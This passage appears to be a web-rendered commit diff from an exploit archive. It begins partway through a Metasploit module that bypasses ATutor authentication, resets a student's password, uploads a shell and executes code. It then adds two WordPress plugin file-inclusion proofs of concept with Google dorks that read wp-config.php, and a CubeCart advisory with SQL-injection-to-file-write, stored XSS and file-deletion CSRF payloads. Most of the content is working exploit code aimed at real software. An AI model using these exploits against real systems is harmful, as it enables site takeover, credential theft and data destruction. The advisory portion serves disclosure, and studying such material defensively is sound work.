||||
'g' => days + 1, # needs to be > the number of days since epoch
|
||||
'h' => '', # not even checked!
|
||||
'form_password_hidden' => hash, # remotely reset the password
|
||||
'submit' => 'Submit'
|
||||
},
|
||||
}, redirect_depth = 0) # to validate a successful bypass
|
||||
|
||||
if res and res.code == 302
|
||||
return pass
|
||||
end
|
||||
# if we land here, the TOCTOU failed us
|
||||
fail_with(Failure::Unknown, "Unable to exploit the TOCTOU and reset the password")
|
||||
end
|
||||
|
||||
def login(username, password, check=false)
|
||||
hash = Rex::Text.sha1(Rex::Text.sha1(password))
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "login.php"),
|
||||
'vars_post' => {
|
||||
'form_password_hidden' => hash,
|
||||
'form_login' => username,
|
||||
'submit' => 'Login',
|
||||
'token' => '',
|
||||
},
|
||||
})
|
||||
# poor php developer practices
|
||||
cookie = "ATutorID=#{$4};" if res && res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/
|
||||
if res && res.code == 302
|
||||
if res.redirection.to_s.include?('bounce.php?course=0')
|
||||
return cookie
|
||||
end
|
||||
end
|
||||
# auth failed if we land here, bail
|
||||
unless check
|
||||
fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
|
||||
end
|
||||
return nil
|
||||
end
|
||||
|
||||
def report_cred(opts)
|
||||
service_data = {
|
||||
address: rhost,
|
||||
port: rport,
|
||||
service_name: ssl ? 'https' : 'http',
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id
|
||||
}
|
||||
|
||||
credential_data = {
|
||||
module_fullname: fullname,
|
||||
post_reference_name: self.refname,
|
||||
private_data: opts[:password],
|
||||
origin_type: :service,
|
||||
private_type: :password,
|
||||
username: opts[:user]
|
||||
}.merge(service_data)
|
||||
|
||||
login_data = {
|
||||
core: create_credential(credential_data),
|
||||
status: Metasploit::Model::Login::Status::SUCCESSFUL,
|
||||
last_attempted_at: Time.now
|
||||
}.merge(service_data)
|
||||
|
||||
create_credential_login(login_data)
|
||||
end
|
||||
|
||||
def exploit
|
||||
# login if needed
|
||||
if (not datastore['USERNAME'].empty? and not datastore['PASSWORD'].empty?)
|
||||
report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD'])
|
||||
student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'])
|
||||
print_good("Logged in as #{datastore['USERNAME']}")
|
||||
# else, we reset the students password via a type juggle vulnerability
|
||||
else
|
||||
print_status("Account details are not set, bypassing authentication...")
|
||||
print_status("Triggering type juggle attack...")
|
||||
student_cookie = type_juggle
|
||||
print_good("Successfully bypassed the authentication in #{@number} requests !")
|
||||
username = find_user(student_cookie)
|
||||
print_good("Found the username: #{username} !")
|
||||
password = reset_password
|
||||
print_good("Successfully reset the #{username}'s account password to #{password} !")
|
||||
report_cred(user: username, password: password)
|
||||
student_cookie = login(username, password)
|
||||
print_good("Logged in as #{username}")
|
||||
end
|
||||
|
||||
if disclose_web_root
|
||||
print_good("Found the webroot")
|
||||
# we got everything. Now onto pwnage
|
||||
if upload_shell(student_cookie, false)
|
||||
print_good("Zip upload successful !")
|
||||
exec_code
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
php.ini settings:
|
||||
display_errors = On
|
||||
=end
|
21
platforms/php/webapps/39621.txt
Executable file
21
platforms/php/webapps/39621.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
# Exploit Title: Wordpress Plugin IMDb Profile Widget - Local File Inclusion
|
||||
# Exploit Author: CrashBandicot @DosPerl
|
||||
# Date: 2016-03-26
|
||||
# Google Dork : inurl:/wp-content/plugins/imdb-widget
|
||||
# Vendor Homepage: https://wordpress.org/plugins/imdb-widget/
|
||||
# Tested on: MSWin32
|
||||
# Version: 1.0.8
|
||||
|
||||
# Vuln file : pic.php
|
||||
|
||||
<?php
|
||||
|
||||
header( 'Content-Type: image/jpeg' );
|
||||
readfile( $_GET["url"] );
|
||||
|
||||
|
||||
# PoC : /wp-content/plugins/imdb-widget/pic.php?url=../../../wp-config.php
|
||||
# Right click -> Save As -> rename pic.jpg in .txt and read file
|
||||
|
||||
# 26/03/2016 - Informed Vendor about Issue
|
||||
# 27/03/2016 - Waiting Reply
|
26
platforms/php/webapps/39623.txt
Executable file
26
platforms/php/webapps/39623.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
# Exploit Title: Wordpress Plugin Photocart Link - Local File Inclusion
|
||||
# Exploit Author: CrashBandicot @DosPerl
|
||||
# Date: 2016-03-27
|
||||
# Google Dork : inurl:/wp-content/plugins/photocart-link/
|
||||
# Vendor Homepage: https://fr.wordpress.org/plugins/photocart-link/
|
||||
# Tested on: MSWin32
|
||||
# Version: 1.6
|
||||
|
||||
# Vuln file : decode.php
|
||||
|
||||
<?php
|
||||
error_reporting(0);
|
||||
header("Cache-control: private");
|
||||
$new = base64_decode($_REQUEST['id']);
|
||||
header("Content-type: image/jpeg");
|
||||
header("Content-transfer-encoding: binary\n");
|
||||
header("Content-Disposition: filename=do_not_copy_these_images");
|
||||
header('Cache-control: no-cache');
|
||||
@readfile($new);
|
||||
?>
|
||||
|
||||
# PoC : /wp-content/plugins/photocart-link/decode.php?id=Li4vLi4vLi4vd3AtY29uZmlnLnBocA==
|
||||
|
||||
# Right click -> Save As -> and Read with Notepad file Saved
|
||||
|
||||
# 27/03/2016 - Vendor Informed about Issues
|
88
platforms/php/webapps/39637.txt
Executable file
88
platforms/php/webapps/39637.txt
Executable file
|
@ -0,0 +1,88 @@
|
|||
Advisory ID: HTB23298
|
||||
Product: CubeCart
|
||||
Vendor: CubeCart Limited
|
||||
Vulnerable Version(s): 6.0.10 and probably prior
|
||||
Tested Version: 6.0.10
|
||||
Advisory Publication: March 2, 2016 [without technical details]
|
||||
Vendor Notification: March 2, 2016
|
||||
Vendor Patch: March 16, 2016
|
||||
Public Disclosure: March 30, 2016
|
||||
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
|
||||
Risk Level: Medium
|
||||
CVSSv3 Base Scores: 6.6 [CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H], 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N], 4.7 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:L]
|
||||
Solution Status: Fixed by Vendor
|
||||
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
|
||||
|
||||
------------------------------------------------------------------------
|
||||
-----------------------
|
||||
|
||||
Advisory Details:
|
||||
|
||||
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in popular open source shopping software CubeCart. The discovered vulnerabilities allow a remote attacker to compromise vulnerable website and its databases, and conduct sophisticated attacks against its users.
|
||||
|
||||
1) SQL Injection in CubeCart
|
||||
|
||||
The vulnerability exists due to insufficient filtration of user-supplied data passed via "char" HTTP GET parameter to "/admin.php" PHP script. A remote authenticated attacker with privileges to view list of products can alter present SQL query, inject and execute arbitrary SQL commands in the application's database. This vulnerability can be also exploited by anonymous attacker via CSRF vector.
|
||||
|
||||
A simple CSRF exploit below will create a PHP file "/var/www/site/file.php" (assuming MySQL has writing permissions to this directory), which can execute phpinfo() function:
|
||||
<img src="http://[host]/admin.php?_g=products&cat_id=1&sort[updated]=DESC&cha
|
||||
r=T]%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,'<? phpinfo(); ?>',1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20INTO%20OUT
|
||||
FILE%20'/var/www/site/file.php'%20--%202">
|
||||
|
||||
2) Stored Cross-Site Scripting in CubeCart
|
||||
|
||||
The vulnerability exists due to insufficient filtration of user-supplied input passed via "first_name" and "last_name" HTTP POST parameters to "/index.php" script. A remote authenticated attacker can edit his or her profile, permanently inject malicious HTML and JavaScript code and execute it in administrator's browser in context of vulnerable website, when the "Customer List" page is viewed. Exploitation of this vulnerability requires the attacker to have valid user credentials, however registration is open by default.
|
||||
|
||||
Successful exploitation of this vulnerability may allow a remote attacker to gain complete control over the web application once the logged-in administrator just visits "Customer List" page. This vulnerability can also be used to perform drive-by-download or spear-phishing attacks against.
|
||||
|
||||
To reproduce the vulnerability, log in to the website with privileges of a regular user and use the exploit below to modify "First" and "Last name" in attacker's profile:
|
||||
|
||||
<form action="http://[host]/index.php?_a=profile" method="POST" name="f1">
|
||||
<input type="hidden" name="title" value="title" />
|
||||
<input type="hidden" name="first_name" value='" onmouseover="javascript:alert(/ImmuniWeb/);"' />
|
||||
<input type="hidden" name="last_name" value='" onmouseover="javascript:alert(/ImmuniWeb/);"' />
|
||||
<input type="hidden" name="email" value="mail (at) mail (dot) com [email concealed]" />
|
||||
<input type="hidden" name="phone" value="1234567" />
|
||||
<input type="hidden" name="mobile" value="" />
|
||||
<input type="hidden" name="passold" value="" />
|
||||
<input type="hidden" name="passnew" value="" />
|
||||
<input type="hidden" name="passconf" value="" />
|
||||
<input type="hidden" name="update" value="Update" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form><script>document.f1.submit();</script>
|
||||
|
||||
A JS popup with "ImmuniWeb" word will be displayed, when the website administrator visits the "Customer List" page:
|
||||
http://[host]/admin.php?_g=customers
|
||||
|
||||
3) Cross-Site Request Forgery in CubeCart
|
||||
|
||||
The vulnerability exists due to insufficient validation of HTTP request origin, when deleting local files. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request, as if it was coming from the legitimate user, and delete arbitrary file on the system.
|
||||
|
||||
A simple exploit below will delete file "/index.php". To reproduce the vulnerability, just log in as an administrator and visit the link below:
|
||||
http://[host]/admin.php?_g=maintenance&node=index&delete=../index.php
|
||||
|
||||
------------------------------------------------------------------------
|
||||
-----------------------
|
||||
|
||||
Solution:
|
||||
|
||||
Update to CubeCart 6.0.11
|
||||
|
||||
More Information:
|
||||
https://forums.cubecart.com/topic/51079-cubecart-6011-released/
|
||||
|
||||
------------------------------------------------------------------------
|
||||
-----------------------
|
||||
|
||||
References:
|
||||
|
||||
[1] High-Tech Bridge Advisory HTB23298 - https://www.htbridge.com/advisory/HTB23298 - Multiple Vulnerabilities in CubeCart
|
||||
[2] CubeCart - https://www.cubecart.com/ - CubeCart is a free responsive open source PHP ecommerce software system.
|
||||
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
|
||||
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
|
||||
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
|
||||
|
||||
------------------------------------------------------------------------
|
||||
-----------------------
|
||||
|
||||
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
|
Loading…
Add table
Reference in a new issue